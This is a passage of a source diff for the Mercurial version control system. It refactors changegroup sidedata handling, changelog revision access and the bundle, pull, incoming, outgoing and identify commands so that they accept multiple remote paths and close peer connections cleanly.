versions.discard(b'01') - versions.discard(b'02') + has_revlogv2 = requirements.REVLOGV2_REQUIREMENT in repo.requirements + if not has_revlogv2: + versions.discard(b'04') if not needv03: versions.discard(b'03') return versions @@ -1543,7 +1731,7 @@ # will support. For example, all hg versions that support generaldelta also # support changegroup 02. versions = supportedoutgoingversions(repo) - if b'generaldelta' in repo.requirements: + if requirements.GENERALDELTA_REQUIREMENT in repo.requirements: versions.discard(b'01') assert versions return min(versions) @@ -1559,6 +1747,7 @@ shallow=False, ellipsisroots=None, fullnodes=None, + remote_sidedata=None, ): assert version in supportedoutgoingversions(repo) @@ -1595,6 +1784,7 @@ shallow=shallow, ellipsisroots=ellipsisroots, fullnodes=fullnodes, + remote_sidedata=remote_sidedata, ) @@ -1638,8 +1828,15 @@ fastpath=False, bundlecaps=None, matcher=None, + remote_sidedata=None, ): - bundler = getbundler(version, repo, bundlecaps=bundlecaps, matcher=matcher) + bundler = getbundler( + version, + repo, + bundlecaps=bundlecaps, + matcher=matcher, + remote_sidedata=remote_sidedata, + ) repo = repo.unfiltered() commonrevs = outgoing.common @@ -1658,7 +1855,15 @@ return bundler.generate(commonrevs, csets, fastpathlinkrev, source) -def _addchangegroupfiles(repo, source, revmap, trp, expectedfiles, needfiles): +def _addchangegroupfiles( + repo, + source, + revmap, + trp, + expectedfiles, + needfiles, + addrevisioncb=None, +): revisions = 0 files = 0 progress = repo.ui.makeprogress( @@ -1673,7 +1878,13 @@ o = len(fl) try: deltas = source.deltaiter() - if not fl.addgroup(deltas, revmap, trp): + added = fl.addgroup( + deltas, + revmap, + trp, + addrevisioncb=addrevisioncb, + ) + if not added: raise error.Abort(_(b"received file revlog group is empty")) except error.CensoredBaseError as e: raise error.Abort(_(b"received delta base is censored: %s") % e) @@ -1702,3 +1913,25 @@ ) return revisions, files + + +def get_sidedata_helpers(repo, remote_sd_categories, pull=False): + # Computers for computing sidedata on-the-fly + sd_computers = collections.defaultdict(list) + # Computers for categories to remove from sidedata + sd_removers = collections.defaultdict(list) + + to_generate = remote_sd_categories - repo._wanted_sidedata + to_remove = repo._wanted_sidedata - remote_sd_categories + if pull: + to_generate, to_remove = to_remove, to_generate + + for revlog_kind, computers in repo._sidedata_computers.items(): + for category, computer in computers.items(): + if category in to_generate: + sd_computers[revlog_kind].append(computer) + if category in to_remove: + sd_removers[revlog_kind].append(computer) + + sidedata_helpers = (repo, sd_computers, sd_removers) + return sidedata_helpers diff --git a/mercurial/changelog.py b/mercurial/changelog.py --- a/mercurial/changelog.py +++ b/mercurial/changelog.py @@ -1,6 +1,6 @@ # changelog.py - changelog class for mercurial # -# Copyright 2005-2007 Matt Mackall <mpm@selenic.com> +# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. @@ -191,7 +191,7 @@ # Extensions might modify _defaultextra, so let the constructor below pass # it in extra = attr.ib() - manifest = attr.ib(default=nullid) + manifest = attr.ib() user = attr.ib(default=b'') date = attr.ib(default=(0, 0)) files = attr.ib(default=attr.Factory(list)) @@ -200,6 +200,7 @@ p1copies = attr.ib(default=None) p2copies = attr.ib(default=None) description = attr.ib(default=b'') + branchinfo = attr.ib(default=(_defaultextra[b'branch'], False)) class changelogrevision(object): @@ -218,9 +219,9 @@ '_changes', ) - def __new__(cls, text, sidedata, cpsd): + def __new__(cls, cl, text, sidedata, cpsd): if not text: - return _changelogrevision(extra=_defaultextra) + return _changelogrevision(extra=_defaultextra, manifest=nullid) self = super(changelogrevision, cls).__new__(cls) # We could return here and implement the following as an __init__. @@ -372,9 +373,14 @@ def description(self): return encoding.tolocal(self._text[self._offsets[3] + 2 :]) + @property + def branchinfo(self): + extra = self.extra + return encoding.tolocal(extra.get(b"branch")), b'close' in extra + class changelog(revlog.revlog): - def __init__(self, opener, trypending=False): + def __init__(self, opener, trypending=False, concurrencychecker=None): """Load a changelog revlog using an opener. If ``trypending`` is true, we attempt to load the index from a @@ -383,6 +389,9 @@ revision) data for a transaction that hasn't been finalized yet. It exists in a separate file to facilitate readers (such as hooks processes) accessing data before a transaction is finalized. + + ``concurrencychecker`` will be passed to the revlog init function, see + the documentation there. """ if trypending and opener.exists(b'00changelog.i.a'): indexfile = b'00changelog.i.a' @@ -398,6 +407,7 @@ checkambig=True, mmaplargeindex=True, persistentnodemap=opener.options.get(b'persistent-nodemap', False), + concurrencychecker=concurrencychecker, ) if self._initempty and (self.version & 0xFFFF == revlog.REVLOGV1): @@ -418,6 +428,7 @@ self._filteredrevs = frozenset() self._filteredrevs_hashcache = {} self._copiesstorage = opener.options.get(b'copies-storage') + self.revlog_kind = b'changelog' @property def filteredrevs(self): @@ -497,7 +508,7 @@ if not self._delayed: revlog.revlog._enforceinlinesize(self, tr, fp) - def read(self, node): + def read(self, nodeorrev): """Obtain data from a parsed changelog revision. Returns a 6-tuple of: @@ -513,9 +524,9 @@ ``changelogrevision`` instead, as it is faster for partial object access. """ - d, s = self._revisiondata(node) + d, s = self._revisiondata(nodeorrev) c = changelogrevision( - d, s, self._copiesstorage == b'changeset-sidedata' + self, d, s, self._copiesstorage == b'changeset-sidedata' ) return (c.manifest, c.user, c.date, c.files, c.description, c.extra) @@ -523,14 +534,14 @@ """Obtain a ``changelogrevision`` for a node or revision.""" text, sidedata = self._revisiondata(nodeorrev) return changelogrevision( - text, sidedata, self._copiesstorage == b'changeset-sidedata' + self, text, sidedata, self._copiesstorage == b'changeset-sidedata' ) - def readfiles(self, node): + def readfiles(self, nodeorrev): """ short version of read that only returns the files modified by the cset """ - text = self.revision(node) + text = self.revision(nodeorrev) if not text: return [] last = text.index(b"\n\n") @@ -592,21 +603,21 @@ parseddate = b"%s %s" % (parseddate, extra) l = [hex(manifest), user, parseddate] + sortedfiles + [b"", desc] text = b"\n".join(l) - return self.addrevision( + rev = self.addrevision( text, transaction, len(self), p1, p2, sidedata=sidedata, flags=flags ) + return self.node(rev) def branchinfo(self, rev): """return the branch name and open/close state of a revision This function exists because creating a changectx object just to access this is costly.""" - extra = self.changelogrevision(rev).extra - return encoding.tolocal(extra.get(b"branch")), b'close' in extra + return self.changelogrevision(rev).branchinfo - def _nodeduplicatecallback(self, transaction, node): + def _nodeduplicatecallback(self, transaction, rev): # keep track of revisions that got "re-added", eg: unbunde of know rev. # # We track them in a list to preserve their order from the source bundle duplicates = transaction.changes.setdefault(b'revduplicates', []) - duplicates.append(self.rev(node)) + duplicates.append(rev) diff --git a/mercurial/cmdutil.py b/mercurial/cmdutil.py --- a/mercurial/cmdutil.py +++ b/mercurial/cmdutil.py @@ -1,6 +1,6 @@ # cmdutil.py - help for command processing in mercurial # -# Copyright 2005-2007 Matt Mackall <mpm@selenic.com> +# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. @@ -16,6 +16,7 @@ from .node import ( hex, nullid, + nullrev, short, ) from .pycompat import ( @@ -1936,12 +1937,12 @@ ui.debug(b'message:\n%s\n' % (message or b'')) if len(parents) == 1: - parents.append(repo[nullid]) + parents.append(repo[nullrev]) if opts.get(b'exact'): if not nodeid or not p1: raise error.InputError(_(b'not a Mercurial patch')) p1 = repo[p1] - p2 = repo[p2 or nullid] + p2 = repo[p2 or nullrev] elif p2: try: p1 = repo[p1] @@ -1951,10 +1952,10 @@ # first parent. if p1 != parents[0]: p1 = parents[0] - p2 = repo[nullid] + p2 = repo[nullrev] except error.RepoError: p1, p2 = parents - if p2.node() == nullid: + if p2.rev() == nullrev: ui.warn( _( b"warning: import the patch as a normal revision\n" @@ -2967,20 +2968,6 @@ # Reroute the working copy parent to the new changeset repo.setparents(newid, nullid) - mapping = {old.node(): (newid,)} - obsmetadata = None - if opts.get(b'note'): - obsmetadata = {b'note': encoding.fromlocal(opts[b'note'])} - backup = ui.configbool(b'rewrite', b'backup-bundle') - scmutil.cleanupnodes( - repo, - mapping, - b'amend', - metadata=obsmetadata, - fixphase=True, - targetphase=commitphase, - backup=backup, - ) # Fixing the dirstate because localrepo.commitctx does not update # it. This is rather convenient because we did not need to update @@ -3003,6 +2990,21 @@ for f in removedfiles: dirstate.drop(f) + mapping = {old.node(): (newid,)} + obsmetadata = None + if opts.get(b'note'): + obsmetadata = {b'note': encoding.fromlocal(opts[b'note'])} + backup = ui.configbool(b'rewrite', b'backup-bundle') + scmutil.cleanupnodes( + repo, + mapping, + b'amend', + metadata=obsmetadata, + fixphase=True, + targetphase=commitphase, + backup=backup, + ) + return newid @@ -3774,7 +3776,7 @@ raise error.StateError(state.msg(), hint=state.hint()) for s in statemod._unfinishedstates: - if s._opname == b'merge' or state._reportonly: + if s._opname == b'merge' or s._reportonly: continue if s._clearable and s.isunfinished(repo): util.unlink(repo.vfs.join(s._fname)) diff --git a/mercurial/commands.py b/mercurial/commands.py --- a/mercurial/commands.py +++ b/mercurial/commands.py @@ -1,6 +1,6 @@ # commands.py - command processing for mercurial # -# Copyright 2005-2007 Matt Mackall <mpm@selenic.com> +# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. @@ -74,8 +74,15 @@ from .utils import ( dateutil, stringutil, + urlutil, ) +if pycompat.TYPE_CHECKING: + from typing import ( + List, + ) + + table = {} table.update(debugcommandsmod.command._table) @@ -1107,9 +1114,8 @@ transition = b"bad" state[transition].append(node) ctx = repo[node] - ui.status( - _(b'changeset %d:%s: %s\n') % (ctx.rev(), ctx, transition) - ) + summary = cmdutil.format_changeset_summary(ui, ctx, b'bisect') + ui.status(_(b'changeset %s: %s\n') % (summary, transition)) hbisect.checkstate(state) # bisect nodes, changesets, bgood = hbisect.bisect(repo, state) @@ -1125,15 +1131,15 @@ nodes, changesets, good = hbisect.bisect(repo, state) if extend: if not changesets: - extendnode = hbisect.extendrange(repo, state, nodes, good) - if extendnode is not None: + extendctx = hbisect.extendrange(repo, state, nodes, good) + if extendctx is not None: ui.write( - _(b"Extending search to changeset %d:%s\n") - % (extendnode.rev(), extendnode) + _(b"Extending search to changeset %s\n") + % cmdutil.format_changeset_summary(ui, extendctx, b'bisect') ) - state[b'current'] = [extendnode.node()] + state[b'current'] = [extendctx.node()] hbisect.save_state(repo, state) - return mayupdate(repo, extendnode.node()) + return mayupdate(repo, extendctx.node()) raise error.StateError(_(b"nothing to extend")) if changesets == 0: @@ -1146,12 +1152,13 @@ while size <= changesets: tests, size = tests + 1, size * 2 rev = repo.changelog.rev(node) + summary = cmdutil.format_changeset_summary(ui, repo[rev], b'bisect') ui.write( _( - b"Testing changeset %d:%s " + b"Testing changeset %s " b"(%d changesets remaining, ~%d tests)\n" ) - % (rev, short(node), changesets, tests) + % (summary, changesets, tests) ) state[b'current'] = [node] hbisect.save_state(repo, state) @@ -1524,10 +1531,10 @@ ), ] + remoteopts, - _(b'[-f] [-t BUNDLESPEC] [-a] [-r REV]... [--base REV]... FILE [DEST]'), + _(b'[-f] [-t BUNDLESPEC] [-a] [-r REV]... [--base REV]... FILE [DEST]...'), helpcategory=command.CATEGORY_IMPORT_EXPORT, ) -def bundle(ui, repo, fname, dest=None, **opts): +def bundle(ui, repo, fname, *dests, **opts): """create a bundle file Generate a bundle file containing data to be transferred to another @@ -1538,7 +1545,7 @@ all the nodes you specify with --base parameters. Otherwise, hg will assume the repository has all the nodes in destination, or default-push/default if no destination is specified, where destination - is the repository you provide through DEST option. + is the repositories you provide through DEST option. You can change bundle format with the -t/--type option. See :hg:`help bundlespec` for documentation on this format. By default, @@ -1583,9 +1590,9 @@ ) if opts.get(b'all'): - if dest: + if dests: raise error.InputError( - _(b"--all is incompatible with specifying a destination") + _(b"--all is incompatible with specifying destinations") ) if opts.get(b'base'): ui.warn(_(b"ignoring --base because --all was specified\n")) @@ -1598,31 +1605,54 @@ ) if base: - if dest: + if dests: raise error.InputError( - _(b"--base is incompatible with specifying a destination") + _(b"--base is incompatible with specifying destinations") ) common = [repo[rev].node() for rev in base] heads = [repo[r].node() for r in revs] if revs else None outgoing = discovery.outgoing(repo, common, heads) + missing = outgoing.missing + excluded = outgoing.excluded else: - dest = ui.expandpath(dest or b'default-push', dest or b'default') - dest, branches = hg.parseurl(dest, opts.get(b'branch')) - other = hg.peer(repo, opts, dest) - revs = [repo[r].hex() for r in revs] - revs, checkout = hg.addbranchrevs(repo, repo, branches, revs) - heads = revs and pycompat.maplist(repo.lookup, revs) or revs - outgoing = discovery.findcommonoutgoing( - repo, - other, - onlyheads=heads, - force=opts.get(b'force'), - portable=True, + missing = set() + excluded = set() + for path in urlutil.get_push_paths(repo, ui, dests): + other = hg.peer(repo, opts, path.rawloc) + if revs is not None: + hex_revs = [repo[r].hex() for r in revs] + else: + hex_revs = None + branches = (path.branch, []) + head_revs, checkout = hg.addbranchrevs( + repo, repo, branches, hex_revs + ) + heads = ( + head_revs + and pycompat.maplist(repo.lookup, head_revs) + or head_revs + ) + outgoing = discovery.findcommonoutgoing( + repo, + other, + onlyheads=heads, + force=opts.get(b'force'), + portable=True, + ) + missing.update(outgoing.missing) + excluded.update(outgoing.excluded) + + if not missing: + scmutil.nochangesfound(ui, repo, not base and excluded) + return 1 + + if heads: + outgoing = discovery.outgoing( + repo, missingroots=missing, ancestorsof=heads ) - - if not outgoing.missing: - scmutil.nochangesfound(ui, repo, not base and outgoing.excluded) - return 1 + else: + outgoing = discovery.outgoing(repo, missingroots=missing) + outgoing.excluded = sorted(excluded) if cgversion == b'01': # bundle1 bversion = b'HG10' + bundlespec.wirecompression @@ -1648,6 +1678,14 @@ if complevel is not None: compopts[b'level'] = complevel + compthreads = ui.configint( + b'experimental', b'bundlecompthreads.' + bundlespec.compression + ) + if compthreads is None: + compthreads = ui.configint(b'experimental', b'bundlecompthreads') + if compthreads is not None: + compopts[b'threads'] = compthreads + # Bundling of obsmarker and phases is optional as not all clients # support the necessary features. cfg = ui.configbool @@ -2399,7 +2437,8 @@ To undo marking a destination file as copied, use --forget. With that option, all given (positional) arguments are unmarked as copies. The - destination file(s) will be left in place (still tracked). + destination file(s) will be left in place (still tracked). Note that + :hg:`copy --forget` behaves the same way as :hg:`rename --forget`. This command takes effect with the next commit by default. @@ -2550,7 +2589,7 @@ if change: repo = scmutil.unhidehashlikerevs(repo, [change], b'nowarn') ctx2 = scmutil.revsingle(repo, change, None) - ctx1 = ctx2.p1() + ctx1 = logcmdutil.diff_parent(ctx2) elif from_rev or to_rev: repo = scmutil.unhidehashlikerevs( repo, [from_rev] + [to_rev], b'nowarn' @@ -3287,7 +3326,8 @@ ) # checking that newnodes exist because old state files won't have it elif statedata.get(b'newnodes') is not None: - statedata[b'newnodes'].append(node) + nn = statedata[b'newnodes'] # type: List[bytes] + nn.append(node) # remove state when we complete successfully if not opts.get(b'dry_run'): @@ -3821,132 +3861,140 @@ output = [] revs = [] - if source: - source, branches = hg.parseurl(ui.expandpath(source)) - peer = hg.peer(repo or ui, opts, source) # only pass ui when no repo - repo = peer.local() - revs, checkout = hg.addbranchrevs(repo, peer, branches, None) - - fm = ui.formatter(b'identify', opts) - fm.startitem() - - if not repo: - if num or branch or tags: - raise error.InputError( - _(b"can't query remote revision number, branch, or tags") + peer = None + try: + if source: + source, branches = urlutil.get_unique_pull_path( + b'identify', repo, ui, source ) - if not rev and revs: - rev = revs[0] - if not rev: - rev = b"tip" - - remoterev = peer.lookup(rev) - hexrev = fm.hexfunc(remoterev) - if default or id: - output = [hexrev] - fm.data(id=hexrev) - - @util.cachefunc - def getbms(): - bms = [] - - if b'bookmarks' in peer.listkeys(b'namespaces'): - hexremoterev = hex(remoterev) - bms = [ - bm - for bm, bmr in pycompat.iteritems( - peer.listkeys(b'bookmarks') + # only pass ui when no repo + peer = hg.peer(repo or ui, opts, source) + repo = peer.local() + revs, checkout = hg.addbranchrevs(repo, peer, branches, None) + + fm = ui.formatter(b'identify', opts) + fm.startitem() + + if not repo: + if num or branch or tags: + raise error.InputError( + _(b"can't query remote revision number, branch, or tags") + ) + if not rev and revs: + rev = revs[0] + if not rev: + rev = b"tip" + + remoterev = peer.lookup(rev) + hexrev = fm.hexfunc(remoterev) + if default or id: + output = [hexrev] + fm.data(id=hexrev) + + @util.cachefunc + def getbms(): + bms = [] + + if b'bookmarks' in peer.listkeys(b'namespaces'): + hexremoterev = hex(remoterev) + bms = [ + bm + for bm, bmr in pycompat.iteritems( + peer.listkeys(b'bookmarks') + ) + if bmr == hexremoterev + ] + + return sorted(bms) + + if fm.isplain(): + if bookmarks: + output.extend(getbms()) + elif default and not ui.quiet: + # multiple bookmarks for a single parent separated by '/' + bm = b'/'.join(getbms()) + if bm: + output.append(bm) + else: + fm.data(node=hex(remoterev)) + if bookmarks or b'bookmarks' in fm.datahint(): + fm.data(bookmarks=fm.formatlist(getbms(), name=b'bookmark')) + else: + if rev: + repo = scmutil.unhidehashlikerevs(repo, [rev], b'nowarn') + ctx = scmutil.revsingle(repo, rev, None) + + if ctx.rev() is None: + ctx = repo[None] + parents = ctx.parents() + taglist = [] + for p in parents: + taglist.extend(p.tags()) + + dirty = b"" + if ctx.dirty(missing=True, merge=False, branch=False): + dirty = b'+' + fm.data(dirty=dirty) + + hexoutput = [fm.hexfunc(p.node()) for p in parents] + if default or id: + output = [b"%s%s" % (b'+'.join(hexoutput), dirty)] + fm.data(id=b"%s%s" % (b'+'.join(hexoutput), dirty)) + + if num: + numoutput = [b"%d" % p.rev() for p in parents] + output.append(b"%s%s" % (b'+'.join(numoutput), dirty)) + + fm.data( + parents=fm.formatlist( + [fm.hexfunc(p.node()) for p in parents], name=b'node' ) - if bmr == hexremoterev - ] - - return sorted(bms) - - if fm.isplain(): - if bookmarks: - output.extend(getbms()) - elif default and not ui.quiet: + ) + else: + hexoutput = fm.hexfunc(ctx.node()) + if default or id: + output = [hexoutput] + fm.data(id=hexoutput) + + if num: + output.append(pycompat.bytestr(ctx.rev())) + taglist = ctx.tags() + + if default and not ui.quiet: + b = ctx.branch() + if b != b'default': + output.append(b"(%s)" % b) + + # multiple tags for a single parent separated by '/' + t = b'/'.join(taglist) + if t: + output.append(t) + # multiple bookmarks for a single parent separated by '/' - bm = b'/'.join(getbms()) + bm = b'/'.join(ctx.bookmarks()) if bm: output.append(bm) - else: - fm.data(node=hex(remoterev)) - if bookmarks or b'bookmarks' in fm.datahint(): - fm.data(bookmarks=fm.formatlist(getbms(), name=b'bookmark')) - else: - if rev: - repo = scmutil.unhidehashlikerevs(repo, [rev], b'nowarn') - ctx = scmutil.revsingle(repo, rev, None) - - if ctx.rev() is None: - ctx = repo[None] - parents = ctx.parents() - taglist = [] - for p in parents: - taglist.extend(p.tags()) - - dirty = b"" - if ctx.dirty(missing=True, merge=False, branch=False): - dirty = b'+' - fm.data(dirty=dirty) - - hexoutput = [fm.hexfunc(p.node()) for p in parents] - if default or id: - output = [b"%s%s" % (b'+'.join(hexoutput), dirty)] - fm.data(id=b"%s%s" % (b'+'.join(hexoutput), dirty)) - - if num: - numoutput = [b"%d" % p.rev() for p in parents] - output.append(b"%s%s" % (b'+'.join(numoutput), dirty)) - - fm.data( - parents=fm.formatlist( - [fm.hexfunc(p.node()) for p in parents], name=b'node' - ) - ) - else: - hexoutput = fm.hexfunc(ctx.node()) - if default or id: - output = [hexoutput] - fm.data(id=hexoutput) - - if num: - output.append(pycompat.bytestr(ctx.rev())) - taglist = ctx.tags() - - if default and not ui.quiet: - b = ctx.branch() - if b != b'default': - output.append(b"(%s)" % b) - - # multiple tags for a single parent separated by '/' - t = b'/'.join(taglist) - if t: - output.append(t) - - # multiple bookmarks for a single parent separated by '/' - bm = b'/'.join(ctx.bookmarks()) - if bm: - output.append(bm) - else: - if branch: - output.append(ctx.branch()) - - if tags: - output.extend(taglist) - - if bookmarks: - output.extend(ctx.bookmarks()) - - fm.data(node=ctx.hex()) - fm.data(branch=ctx.branch()) - fm.data(tags=fm.formatlist(taglist, name=b'tag', sep=b':')) - fm.data(bookmarks=fm.formatlist(ctx.bookmarks(), name=b'bookmark')) - fm.context(ctx=ctx) - - fm.plain(b"%s\n" % b' '.join(output)) - fm.end() + else: + if branch: + output.append(ctx.branch()) + + if tags: + output.extend(taglist) + + if bookmarks: + output.extend(ctx.bookmarks()) + + fm.data(node=ctx.hex()) + fm.data(branch=ctx.branch()) + fm.data(tags=fm.formatlist(taglist, name=b'tag', sep=b':')) + fm.data(bookmarks=fm.formatlist(ctx.bookmarks(), name=b'bookmark')) + fm.context(ctx=ctx) + + fm.plain(b"%s\n" % b' '.join(output)) + fm.end() + finally: + if peer: + peer.close() @command( @@ -4288,22 +4336,22 @@ cmdutil.check_incompatible_arguments(opts, b'subrepos', [b'bundle']) if opts.get(b'bookmarks'): - source, branches = hg.parseurl( - ui.expandpath(source), opts.get(b'branch') - ) - other = hg.peer(repo, opts, source) - if b'bookmarks' not in other.listkeys(b'namespaces'): - ui.warn(_(b"remote doesn't support bookmarks\n")) - return 0 - ui.pager(b'incoming') - ui.status(_(b'comparing with %s\n') % util.hidepassword(source)) - return bookmarks.incoming(ui, repo, other) - - repo._subtoppath = ui.expandpath(source) - try: - return hg.incoming(ui, repo, source, opts) - finally: - del repo._subtoppath + srcs = urlutil.get_pull_paths(repo, ui, [source], opts.get(b'branch')) + for source, branches in srcs: + other = hg.peer(repo, opts, source) + try: + if b'bookmarks' not in other.listkeys(b'namespaces'): + ui.warn(_(b"remote doesn't support bookmarks\n")) + return 0 + ui.pager(b'incoming') + ui.status( + _(b'comparing with %s\n') % urlutil.hidepassword(source) + ) + return bookmarks.incoming(ui, repo, other) + finally: + other.close() + + return hg.incoming(ui, repo, source, opts) @command( @@ -4328,7 +4376,9 @@ Returns 0 on success. """ opts = pycompat.byteskwargs(opts) - hg.peer(ui, opts, ui.expandpath(dest), create=True) + path = urlutil.get_clone_path(ui, dest)[1] + peer = hg.peer(ui, opts, path, create=True) + peer.close() @command( @@ -4896,10 +4946,10 @@ + logopts + remoteopts + subrepoopts, - _(b'[-M] [-p] [-n] [-f] [-r REV]... [DEST]'), + _(b'[-M] [-p] [-n] [-f] [-r REV]... [DEST]...'), helpcategory=command.CATEGORY_REMOTE_REPO_MANAGEMENT, ) -def outgoing(ui, repo, dest=None, **opts): +def outgoing(ui, repo, *dests, **opts): """show changesets not found in the destination Show changesets not found in the specified destination repository @@ -4935,47 +4985,24 @@ Returns 0 if there are outgoing changes, 1 otherwise. """ - # hg._outgoing() needs to re-resolve the path in order to handle #branch - # style URLs, so don't overwrite dest. - path = ui.paths.getpath(dest, default=(b'default-push', b'default')) - if not path: - raise error.ConfigError( - _(b'default repository not configured!'), - hint=_(b"see 'hg help config.paths'"), - ) - opts = pycompat.byteskwargs(opts) - if opts.get(b'graph'): - logcmdutil.checkunsupportedgraphflags([], opts) - o, other = hg._outgoing(ui, repo, dest, opts) - if not o: - cmdutil.outgoinghooks(ui, repo, other, opts, o) - return - - revdag = logcmdutil.graphrevs(repo, o, opts) - ui.pager(b'outgoing') - displayer = logcmdutil.changesetdisplayer(ui, repo, opts, buffered=True) - logcmdutil.displaygraph( - ui, repo, revdag, displayer, graphmod.asciiedges - ) - cmdutil.outgoinghooks(ui, repo, other, opts, o) - return 0 - if opts.get(b'bookmarks'): - dest = path.pushloc or path.loc - other = hg.peer(repo, opts, dest) - if b'bookmarks' not in other.listkeys(b'namespaces'): - ui.warn(_(b"remote doesn't support bookmarks\n")) - return 0 - ui.status(_(b'comparing with %s\n') % util.hidepassword(dest)) - ui.pager(b'outgoing') - return bookmarks.outgoing(ui, repo, other) - - repo._subtoppath = path.pushloc or path.loc - try: - return hg.outgoing(ui, repo, dest, opts) - finally: - del repo._subtoppath + for path in urlutil.get_push_paths(repo, ui, dests): + dest = path.pushloc or path.loc + other = hg.peer(repo, opts, dest) + try: + if b'bookmarks' not in other.listkeys(b'namespaces'): + ui.warn(_(b"remote doesn't support bookmarks\n")) + return 0 + ui.status( + _(b'comparing with %s\n') % urlutil.hidepassword(dest) + ) + ui.pager(b'outgoing') + return bookmarks.outgoing(ui, repo, other) + finally: + other.close() + + return hg.outgoing(ui, repo, dests, opts) @command( @@ -5113,7 +5140,7 @@ fm = ui.formatter(b'paths', opts) if fm.isplain(): - hidepassword = util.hidepassword + hidepassword = urlutil.hidepassword else: hidepassword = bytes if ui.quiet: @@ -5244,9 +5271,11 @@ :optupdate: updating working directory is needed or not :checkout: update destination revision (or None to default destination) :brev: a name, which might be a bookmark to be activated after updating + + return True if update raise any conflict, False otherwise. """ if modheads == 0: - return + return False if optupdate: try: return hg.updatetotally(ui, repo, checkout, brev) @@ -5268,6 +5297,7 @@ ui.status(_(b"(run 'hg heads' to see heads)\n")) elif not ui.configbool(b'commands', b'update.requiredest'): ui.status(_(b"(run 'hg update' to get a working copy)\n")) + return False @command( @@ -5308,11 +5338,11 @@ ), ] + remoteopts, - _(b'[-u] [-f] [-r REV]... [-e CMD] [--remotecmd CMD] [SOURCE]'), + _(b'[-u] [-f] [-r REV]... [-e CMD] [--remotecmd CMD] [SOURCE]...'), helpcategory=command.CATEGORY_REMOTE_REPO_MANAGEMENT, helpbasic=True, ) -def pull(ui, repo, source=b"default", **opts): +def pull(ui, repo, *sources, **opts): """pull changes from the specified source Pull changes from a remote repository to a local one. @@ -5336,6 +5366,10 @@ If SOURCE is omitted, the 'default' path will be used. See :hg:`help urls` for more information. + If multiple sources are specified, they will be pulled sequentially as if + the command was run multiple time. If --update is specify and the command + will stop at the first failed --update. + Specifying bookmark as ``.`` is equivalent to specifying the active bookmark's name. @@ -5350,101 +5384,211 @@ hint = _(b'use hg pull followed by hg update DEST') raise error.InputError(msg, hint=hint) - source, branches = hg.parseurl(ui.expandpath(source), opts.get(b'branch')) - ui.status(_(b'pulling from %s\n') % util.hidepassword(source)) - ui.flush() - other = hg.peer(repo, opts, source) - try: - revs, checkout = hg.addbranchrevs( - repo, other, branches, opts.get(b'rev') - ) - - pullopargs = {} - - nodes = None - if opts.get(b'bookmark') or revs: - # The list of bookmark used here is the same used to actually update - # the bookmark names, to avoid the race from issue 4689 and we do - # all lookup and bookmark queries in one go so they see the same - # version of the server state (issue 4700). - nodes = [] - fnodes = [] - revs = revs or [] - if revs and not other.capable(b'lookup'): - err = _( - b"other repository doesn't support revision lookup, " - b"so a rev cannot be specified." - ) - raise error.Abort(err) - with other.commandexecutor() as e: - fremotebookmarks = e.callcommand( - b'listkeys', {b'namespace': b'bookmarks'} - ) - for r in revs: - fnodes.append(e.callcommand(b'lookup', {b'key': r})) - remotebookmarks = fremotebookmarks.result() - remotebookmarks = bookmarks.unhexlifybookmarks(remotebookmarks) - pullopargs[b'remotebookmarks'] = remotebookmarks - for b in opts.get(b'bookmark', []): - b = repo._bookmarks.expandname(b) - if b not in remotebookmarks: - raise error.InputError( - _(b'remote bookmark %s not found!') % b + sources = urlutil.get_pull_paths(repo, ui, sources, opts.get(b'branch')) + for source, branches in sources: + ui.status(_(b'pulling from %s\n') % urlutil.hidepassword(source)) + ui.flush() + other = hg.peer(repo, opts, source) + update_conflict = None + try: + revs, checkout = hg.addbranchrevs( + repo, other, branches, opts.get(b'rev') + ) + + pullopargs = {} + + nodes = None + if opts.get(b'bookmark') or revs: + # The list of bookmark used here is the same used to actually update + # the bookmark names, to avoid the race from issue 4689 and we do + # all lookup and bookmark queries in one go so they see the same + # version of the server state (issue 4700). + nodes = [] + fnodes = [] + revs = revs or [] + if revs and not other.capable(b'lookup'): + err = _( + b"other repository doesn't support revision lookup, " + b"so a rev cannot be specified." + ) + raise error.Abort(err) + with other.commandexecutor() as e: + fremotebookmarks = e.callcommand( + b'listkeys', {b'namespace': b'bookmarks'} + ) + for r in revs: + fnodes.append(e.callcommand(b'lookup', {b'key': r})) + remotebookmarks = fremotebookmarks.result() + remotebookmarks = bookmarks.unhexlifybookmarks(remotebookmarks) + pullopargs[b'remotebookmarks'] = remotebookmarks + for b in opts.get(b'bookmark', []): + b = repo._bookmarks.expandname(b) + if b not in remotebookmarks: + raise error.InputError( + _(b'remote bookmark %s not found!') % b + ) + nodes.append(remotebookmarks[b]) + for i, rev in enumerate(revs): + node = fnodes[i].result() + nodes.append(node) + if rev == checkout: + checkout = node + + wlock = util.nullcontextmanager() + if opts.get(b'update'): + wlock = repo.wlock() + with wlock: + pullopargs.update(opts.get(b'opargs', {})) + modheads = exchange.pull( + repo, + other, + heads=nodes, + force=opts.get(b'force'), + bookmarks=opts.get(b'bookmark', ()), + opargs=pullopargs, + confirm=opts.get(b'confirm'), + ).cgresult + + # brev is a name, which might be a bookmark to be activated at + # the end of the update. In other words, it is an explicit + # destination of the update + brev = None + + if checkout: + checkout = repo.unfiltered().changelog.rev(checkout) + + # order below depends on implementation of + # hg.addbranchrevs(). opts['bookmark'] is ignored, + # because 'checkout' is determined without it. + if opts.get(b'rev'): + brev = opts[b'rev'][0] + elif opts.get(b'branch'): + brev = opts[b'branch'][0] + else: + brev = branches[0] + repo._subtoppath = source + try: + update_conflict = postincoming( + ui, repo, modheads, opts.get(b'update'), checkout, brev ) - nodes.append(remotebookmarks[b]) - for i, rev in enumerate(revs): - node = fnodes[i].result() - nodes.append(node) - if rev == checkout: - checkout = node - - wlock = util.nullcontextmanager() - if opts.get(b'update'): - wlock = repo.wlock() - with wlock: - pullopargs.update(opts.get(b'opargs', {})) - modheads = exchange.pull( - repo, - other, - heads=nodes, - force=opts.get(b'force'), - bookmarks=opts.get(b'bookmark', ()), - opargs=pullopargs, - confirm=opts.get(b'confirm'), - ).cgresult - - # brev is a name, which might be a bookmark to be activated at - # the end of the update. In other words, it is an explicit - # destination of the update - brev = None - - if checkout: - checkout = repo.unfiltered().changelog.rev(checkout) - - # order below depends on implementation of - # hg.addbranchrevs(). opts['bookmark'] is ignored, - # because 